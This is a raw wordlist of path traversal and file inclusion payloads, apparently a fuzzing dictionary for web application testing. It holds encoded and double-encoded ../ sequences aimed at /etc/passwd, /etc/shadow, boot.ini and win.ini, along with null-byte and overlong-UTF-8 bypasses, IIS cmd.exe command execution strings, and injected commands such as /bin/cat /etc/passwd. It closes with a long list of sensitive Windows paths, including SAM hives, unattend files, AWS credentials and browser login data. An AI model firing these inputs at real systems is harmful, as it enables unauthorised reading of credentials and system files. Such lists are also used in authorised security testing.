%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
%00/etc/passwd%00
%00/etc/shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%68%74%61%63%63%65%73%73
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../etc/passwd
../../../../../../../../conf/server.xml
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../.htaccess
../../../etc/passwd
../../.htaccess
../../boot.ini
../.htaccess
..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
././.htaccess
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
.htaccess
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/.../.../.../.../.../
/../../../../../../../../%2A
/../../../../../../../../../../../boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/../../../../../../../../../../../etc/passwd%00.html
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../bin/id|
/..\../..\../..\../..\../..\../..\../boot.ini
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
/./././././././././././boot.ini
/./././././././././././etc/passwd
/./././././././././././etc/shadow
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
C:/$recycle.bin/s-1-5-18/desktop.ini
C:/Documents and Settings/Administrator/NTUser.dat
C:/MININT/SMSOSD/OSDLOGS/VARIABLES.DAT
C:/MySQL/data/hostname.err
C:/MySQL/data/mysql-bin.log
C:/MySQL/data/mysql.err
C:/MySQL/data/mysql.log
C:/MySQL/my.cnf
C:/MySQL/my.ini
C:/Program Files (x86)/Apache Group/Apache/conf/access.log
C:/Program Files (x86)/Apache Group/Apache/conf/error.log
C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml
C:/Program Files (x86)/xampp/apache/conf/httpd.conf
C:/Program Files/Apache Group/Apache/conf/httpd.conf
C:/Program Files/Apache Group/Apache/logs/access.log
C:/Program Files/Apache Group/Apache/logs/error.log
C:/Program Files/Apache Group/Apache2/conf/httpd.conf
C:/Program Files/FileZilla Server/FileZilla Server.xml
C:/Program Files/Microsoft SQL Server/MSSQL.1/Template Data/master.mdf
C:/Program Files/Microsoft SQL Server/MSSQL10.SQLEXPRESS/Template Data/master.mdf
C:/Program Files/Microsoft SQL Server/MSSQL11.SQLEXPRESS/Template Data/master.mdf
C:/Program Files/Microsoft SQL Server/MSSQL12.SQLEXPRESS/Template Data/master.mdf
C:/Program Files/Microsoft SQL Server/MSSQL13.SQLEXPRESS/Template Data/master.mdf
C:/Program Files/Microsoft SQL Server/MSSQL14.SQLEXPRESS/Template Data/master.mdf
C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/my.ini
C:/Program Files/MySQL/MySQL Server 5.1/my.ini
C:/Program Files/MySQL/data/hostname.err
C:/Program Files/MySQL/data/mysql-bin.log
C:/Program Files/MySQL/data/mysql.err
C:/Program Files/MySQL/data/mysql.log
C:/Program Files/MySQL/my.cnf
C:/Program Files/MySQL/my.ini
C:/ProgramFiles/ApacheGroup/Apache/conf/httpd.conf
C:/ProgramFiles/ApacheGroup/Apache/logs/access.log
C:/ProgramFiles/ApacheGroup/Apache/logs/error.log
C:/ProgramFiles/ApacheGroup/Apache2/conf/httpd.conf
C:/ProgramFiles/MySQL/MySQLServer5.0/data/hostname.err
C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql-bin.log
C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.err
C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.log
C:/ProgramFiles/MySQL/MySQLServer5.0/my.cnf
C:/ProgramFiles/MySQL/MySQLServer5.0/my.ini
C:/ProgramFiles/MySQL/data/hostname.err
C:/ProgramFiles/MySQL/data/mysql-bin.log
C:/ProgramFiles/MySQL/data/mysql.err
C:/ProgramFiles/MySQL/data/mysql.log
C:/ProgramFiles/MySQL/my.cnf
C:/ProgramFiles/MySQL/my.ini
C:/ProgramFiles/xampp/apache/conf/httpd.conf
C:/Users/Administrator/NTUser.dat
C:/WINDOWS/Repair/SAM
C:/WINDOWS/System32/drivers/etc/hosts
C:/WINDOWS/TEMP/
C:/WINDOWS/php.ini
C:/WINDOWS/win.ini
C:/WINNT/php.ini
C:/WINNT/win.ini
C:/Windows/Panther/Unattend/Unattended.xml
C:/Windows/Panther/Unattended.xml
C:/Windows/System32/inetsrv/config/applicationHost.config
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
C:/Windows/debug/NetSetup.log
C:/Windows/repair/security
C:/Windows/repair/software
C:/Windows/repair/system
C:/Windows/system32/config/AppEvent.Evt
C:/Windows/system32/config/SecEvent.Evt
C:/Windows/system32/config/default.sav
C:/Windows/system32/config/regback/default
C:/Windows/system32/config/regback/sam
C:/Windows/system32/config/regback/security
C:/Windows/system32/config/regback/software
C:/Windows/system32/config/regback/system
C:/Windows/system32/config/security.sav
C:/Windows/system32/config/software.sav
C:/Windows/system32/config/system.sav
C:/Windows/win.ini
C:/apache/log/access.log
C:/apache/log/access_log
C:/apache/log/error.log
C:/apache/log/error_log
C:/apache/logs/access.log
C:/apache/logs/access_log
C:/apache/logs/error.log
C:/apache/logs/error_log
C:/apache/php/php.ini
C:/apache2/log/access.log
C:/apache2/log/access_log
C:/apache2/log/error.log
C:/apache2/log/error_log
C:/apache2/logs/access.log
C:/apache2/logs/access_log
C:/apache2/logs/error.log
C:/apache2/logs/error_log
C:/boot.ini
C:/documents and settings/administrator/desktop/desktop.ini
C:/documents and settings/administrator/ntuser.dat
C:/documents and settings/administrator/ntuser.ini
C:/home/bin/stable/apache/php.ini
C:/home2/bin/stable/apache/php.ini
C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
C:/inetpub/logs/logfiles
C:/inetpub/wwwroot/global.asa
C:/inetpub/wwwroot/index.asp
C:/inetpub/wwwroot/web.config
C:/log/access.log
C:/log/access_log
C:/log/error.log
C:/log/error_log
C:/log/httpd/access_log
C:/log/httpd/error_log
C:/logs/access.log
C:/logs/access_log
C:/logs/error.log
C:/logs/error_log
C:/logs/httpd/access_log
C:/logs/httpd/error_log
C:/mysql/bin/my.ini
C:/mysql/data/hostname.err
C:/mysql/data/mysql.err
C:/mysql/data/mysql.log
C:/mysql/my.cnf
C:/mysql/my.ini
C:/opt/xampp/logs/access.log
C:/opt/xampp/logs/access_log
C:/opt/xampp/logs/error.log
C:/opt/xampp/logs/error_log
C:/php/php.ini
C:/php/sessions/
C:/php4/php.ini
C:/php4/sessions/
C:/php5/php.ini
C:/php5/sessions/
C:/program files (x86)/apache group/apache/conf/access.log
C:/program files (x86)/apache group/apache/conf/error.log
C:/program files (x86)/apache group/apache/conf/httpd.conf
C:/program files (x86)/apache group/apache/logs/access.log
C:/program files (x86)/apache group/apache/logs/error.log
C:/program files (x86)/apache group/apache2/conf/httpd.conf
C:/program files (x86)/filezilla server/filezilla server.xml
C:/program files (x86)/mysql/data/hostname.err
C:/program files (x86)/mysql/data/mysql-bin.log
C:/program files (x86)/mysql/data/mysql.err
C:/program files (x86)/mysql/data/mysql.log
C:/program files (x86)/mysql/my.cnf
C:/program files (x86)/mysql/my.ini
C:/program files (x86)/mysql/mysql server 5.0/data/hostname.err
C:/program files (x86)/mysql/mysql server 5.0/data/mysql-bin.log
C:/program files (x86)/mysql/mysql server 5.0/data/mysql.err
C:/program files (x86)/mysql/mysql server 5.0/data/mysql.log
C:/program files (x86)/mysql/mysql server 5.0/my.cnf
C:/program files (x86)/mysql/mysql server 5.0/my.ini
C:/program files (x86)/mysql/mysql server 5.1/my.ini
C:/program files (x86)/xampp/apache/conf/httpd.conf
C:/program files/apache group/apache/conf/access.log
C:/program files/apache group/apache/conf/error.log
C:/program files/apache group/apache/conf/httpd.conf
C:/program files/apache group/apache/logs/access.log
C:/program files/apache group/apache/logs/error.log
C:/program files/apache group/apache2/conf/httpd.conf
C:/program files/filezilla server/filezilla server.xml
C:/program files/mysql/data/hostname.err
C:/program files/mysql/data/mysql-bin.log
C:/program files/mysql/data/mysql.err
C:/program files/mysql/data/mysql.log
C:/program files/mysql/my.cnf
C:/program files/mysql/my.ini
C:/program files/mysql/mysql server 5.0/data/hostname.err
C:/program files/mysql/mysql server 5.0/data/mysql-bin.log
C:/program files/mysql/mysql server 5.0/data/mysql.err
C:/program files/mysql/mysql server 5.0/data/mysql.log
C:/program files/mysql/mysql server 5.0/my.cnf
C:/program files/mysql/mysql server 5.0/my.ini
C:/program files/mysql/mysql server 5.1/my.ini
C:/program files/xampp/apache/conf/httpd.conf
C:/programdata/mcafee/common framework/sitelist.xml
C:/sysprep.inf
C:/sysprep.xml
C:/sysprep/sysprep.inf
C:/sysprep/sysprep.xml
C:/system volume information/wpsettings.dat
C:/system32/inetsrv/metabase.xml
C:/unattend.txt
C:/unattend.xml
C:/unattended.txt
C:/unattended.xml
C:/users/administrator/.aws/config
C:/users/administrator/.aws/credentials
C:/users/administrator/.elasticbeanstalk/config
C:/users/administrator/appdata/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt
C:/users/administrator/appdata/local/google/chrome/user data/default/bookmarks
C:/users/administrator/appdata/local/google/chrome/user data/default/bookmarks.bak
C:/users/administrator/appdata/local/google/chrome/user data/default/cookies
C:/users/administrator/appdata/local/google/chrome/user data/default/history
C:/users/administrator/appdata/local/google/chrome/user data/default/last session
C:/users/administrator/appdata/local/google/chrome/user data/default/login data
C:/users/administrator/appdata/local/google/chrome/user data/default/preferences
C:/users/administrator/appdata/local/google/chrome/user data/default/secure preferences
C:/users/administrator/appdata/local/google/chrome/user data/default/top sites
C:/users/administrator/desktop/desktop.ini
C:/users/administrator/desktop/proof.txt
C:/users/administrator/ntuser.dat
C:/users/administrator/ntuser.ini
C:/windows/csc/v2.0.6/pq
C:/windows/csc/v2.0.6/sm
C:/windows/debug/netsetup.log
C:/windows/explorer.exe
C:/windows/iis5.log
C:/windows/iis6.log
C:/windows/iis7.log
C:/windows/iis8.log
C:/windows/notepad.exe
C:/windows/panther/setupinfo
C:/windows/panther/setupinfo.bak
C:/windows/panther/sysprep.inf
C:/windows/panther/sysprep.xml
C:/windows/panther/unattend.txt
C:/windows/panther/unattend.xml
C:/windows/panther/unattend/setupinfo
C:/windows/panther/unattend/setupinfo.bak
C:/windows/panther/unattend/sysprep.inf
C:/windows/panther/unattend/sysprep.xml
C:/windows/panther/unattend/unattend.txt
C:/windows/panther/unattend/unattend.xml
C:/windows/panther/unattend/unattended.txt
C:/windows/panther/unattend/unattended.xml
C:/windows/panther/unattended.txt
C:/windows/panther/unattended.xml
C:/windows/php.ini
C:/windows/repair/sam
C:/windows/repair/security
C:/windows/repair/software
C:/windows/repair/system
C:/windows/system.ini
C:/windows/system32/config/appevent.evt
C:/windows/system32/config/default.sav
C:/windows/system32/config/regback/default
C:/windows/system32/config/regback/sam
C:/windows/system32/config/regback/security
C:/windows/system32/config/regback/software
C:/windows/system32/config/regback/system
C:/windows/system32/config/sam
C:/windows/system32/config/secevent.evt
C:/windows/system32/config/security.sav
C:/windows/system32/config/software.sav
C:/windows/system32/config/system
C:/windows/system32/config/system.sa
C:/windows/system32/config/system.sav
C:/windows/system32/drivers/etc/hosts
C:/windows/system32/eula.txt
C:/windows/system32/inetsrv/config/applicationhost.config
C:/windows/system32/inetsrv/config/schema/aspnet_schema.xml
C:/windows/system32/license.rtf
C:/windows/system32/logfiles/httperr/httperr1.log
C:/windows/system32/sysprep.inf
C:/windows/system32/sysprep.xml
C:/windows/system32/sysprep/sysprep.xml
C:/windows/system32/sysprepsysprep.inf
C:/windows/system32/sysprepsysprep.xml
C:/windows/system32/sysprepunattend.txt
C:/windows/system32/sysprepunattend.xml
C:/windows/system32/sysprepunattended.txt
C:/windows/system32/sysprepunattended.xml
C:/windows/system32/unattend.txt
C:/windows/system32/unattend.xml
C:/windows/system32/unattended.txt
C:/windows/system32/unattended.xml
C:/windows/temp/
C:/windows/win.ini
C:/windows/windowsupdate.log
C:/winnt/php.ini
C:/winnt/win.ini
C:/xampp/apache/bin/php.ini
C:/xampp/apache/conf/httpd.conf
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/xampp/filezillaftp/filezilla server.xml
C:/xampp/filezillaftp/logs
C:/xampp/filezillaftp/logs/access.log
C:/xampp/filezillaftp/logs/error.log
C:/xampp/mercurymail/logs/access.log
C:/xampp/mercurymail/logs/error.log
C:/xampp/mercurymail/mercury.ini
C:/xampp/mysql/data/mysql.err
C:/xampp/php/php.ini
C:/xampp/phpmyadmin/config.inc
C:/xampp/phpmyadmin/config.inc.php
C:/xampp/phpmyadmin/phpinfo.php
C:/xampp/sendmail/sendmail.ini
C:/xampp/sendmail/sendmail.log
C:/xampp/tomcat/conf/tomcat-users.xml
C:/xampp/tomcat/conf/web.xml
C:/xampp/webalizer/webalizer.conf
C:/xampp/webdav/webdav.txt
C:\boot.ini
C:\inetpub\wwwroot\global.asa
\..\..\..\..\..\..\..\..\..\..\boot.ini
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\WINDOWS\win.ini
\..\..\..\WINDOWS\win.ini
\..\..\WINDOWS\win.ini
\..\WINDOWS\win.ini
\\&apos;/bin/cat%20/etc/passwd\\&apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
c:/MySQL/data/mysql-bin.index
c:/MySQL/data/mysql-bin.log
c:/MySQL/data/mysql.err
c:/MySQL/data/mysql.log
c:/MySQL/data/{IPDELHOST}.err
c:/MySQL/my.cnf
c:/MySQL/my.ini
c:/NetServer/bin/stable/apache/php.ini
c:/PHP/php.ini
c:/PostgreSQL/log/pgadmin.log
c:/Program Files/Apache Group/Apache/apache.conf
c:/Program Files/Apache Group/Apache/apache2.conf
c:/Program Files/Apache Group/Apache/conf/apache.conf
c:/Program Files/Apache Group/Apache/conf/apache2.conf
c:/Program Files/Apache Group/Apache/conf/httpd.conf
c:/Program Files/Apache Group/Apache/logs/access.log
c:/Program Files/Apache Group/Apache/logs/error.log
c:/Program Files/Apache Group/Apache2/conf/apache.conf
c:/Program Files/Apache Group/Apache2/conf/apache2.conf
c:/Program Files/Apache Group/Apache2/conf/httpd.conf
c:/Program Files/Apache Software Foundation/Apache2.2/conf/httpd.conf
c:/Program Files/Apache Software Foundation/Apache2.2/logs/access.log
c:/Program Files/Apache Software Foundation/Apache2.2/logs/error.log
c:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.index
c:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
c:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
c:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
c:/Program Files/MySQL/MySQL Server 5.0/data/{IPDELHOST}.err
c:/Program Files/MySQL/MySQL Server 5.0/my.cnf
c:/Program Files/MySQL/MySQL Server 5.0/my.ini
c:/Program Files/MySQL/data/mysql-bin.index
c:/Program Files/MySQL/data/mysql-bin.log
c:/Program Files/MySQL/data/mysql.err
c:/Program Files/MySQL/data/mysql.log
c:/Program Files/MySQL/data/{IPDELHOST}.err
c:/Program Files/MySQL/my.cnf
c:/Program Files/MySQL/my.ini
c:/Program Files/PostgreSQL/8.3/data/pg_hba.conf
c:/Program Files/PostgreSQL/8.3/data/pg_ident.conf
c:/Program Files/PostgreSQL/8.3/data/postgresql.conf
c:/Program Files/PostgreSQL/8.4/data/pg_hba.conf
c:/Program Files/PostgreSQL/8.4/data/pg_ident.conf
c:/Program Files/PostgreSQL/8.4/data/postgresql.conf
c:/Program Files/PostgreSQL/9.0/data/pg_hba.conf
c:/Program Files/PostgreSQL/9.0/data/pg_ident.conf
c:/Program Files/PostgreSQL/9.0/data/postgresql.conf
c:/Program Files/PostgreSQL/9.1/data/pg_hba.conf
c:/Program Files/PostgreSQL/9.1/data/pg_ident.conf
c:/Program Files/PostgreSQL/9.1/data/postgresql.conf
c:/Program Files/Vidalia Bundle/Polipo/polipo.conf
c:/Program Files/xampp/apache/conf/apache.conf
c:/Program Files/xampp/apache/conf/apache2.conf
c:/Program Files/xampp/apache/conf/httpd.conf
c:/WINDOWS/Debug/NetSetup.LOG
c:/WINDOWS/ODBC.INI
c:/WINDOWS/WindowsUpdate.log
c:/WINDOWS/comsetup.log
c:/WINDOWS/php.ini
c:/WINDOWS/repair/setup.log
c:/WINDOWS/setupact.log
c:/WINDOWS/setupapi.log
c:/WINDOWS/setuperr.log
c:/WINDOWS/system32/Macromed/Flash/FlashInstall.log
c:/WINDOWS/system32/Macromed/Flash/install.log
c:/WINDOWS/system32/drivers/etc/hosts
c:/WINDOWS/system32/drivers/etc/lmhosts.sam
c:/WINDOWS/system32/drivers/etc/networks
c:/WINDOWS/system32/drivers/etc/protocol
c:/WINDOWS/system32/drivers/etc/services
c:/WINDOWS/system32/logfiles/Firewall/pfirewall.log
c:/WINDOWS/system32/logfiles/Firewall/pfirewall.log.old
c:/WINDOWS/system32/logfiles/MSFTPSVC
c:/WINDOWS/system32/logfiles/MSFTPSVC1
c:/WINDOWS/system32/logfiles/MSFTPSVC2
c:/WINDOWS/system32/logfiles/SMTPSVC
c:/WINDOWS/system32/logfiles/SMTPSVC1
c:/WINDOWS/system32/logfiles/SMTPSVC2
c:/WINDOWS/system32/logfiles/SMTPSVC3
c:/WINDOWS/system32/logfiles/SMTPSVC4
c:/WINDOWS/system32/logfiles/SMTPSVC5
c:/WINDOWS/system32/logfiles/W3SVC/inetsvn1.log
c:/WINDOWS/system32/logfiles/W3SVC1/inetsvn1.log
c:/WINDOWS/system32/logfiles/W3SVC2/inetsvn1.log
c:/WINDOWS/system32/logfiles/W3SVC3/inetsvn1.log
c:/WINDOWS/updspapi.log
c:/WINDOWS/wmsetup.log
c:/WINNT/php.ini
c:/WINNT/system32/logfiles/Firewall/pfirewall.log
c:/WINNT/system32/logfiles/Firewall/pfirewall.log.old
c:/WINNT/system32/logfiles/MSFTPSVC
c:/WINNT/system32/logfiles/MSFTPSVC1
c:/WINNT/system32/logfiles/MSFTPSVC2
c:/WINNT/system32/logfiles/SMTPSVC
c:/WINNT/system32/logfiles/SMTPSVC1
c:/WINNT/system32/logfiles/SMTPSVC2
c:/WINNT/system32/logfiles/SMTPSVC3
c:/WINNT/system32/logfiles/SMTPSVC4
c:/WINNT/system32/logfiles/SMTPSVC5
c:/WINNT/system32/logfiles/W3SVC/inetsvn1.log
c:/WINNT/system32/logfiles/W3SVC1/inetsvn1.log
c:/WINNT/system32/logfiles/W3SVC2/inetsvn1.log
c:/WINNT/system32/logfiles/W3SVC3/inetsvn1.log
c:/apache/php/php.ini
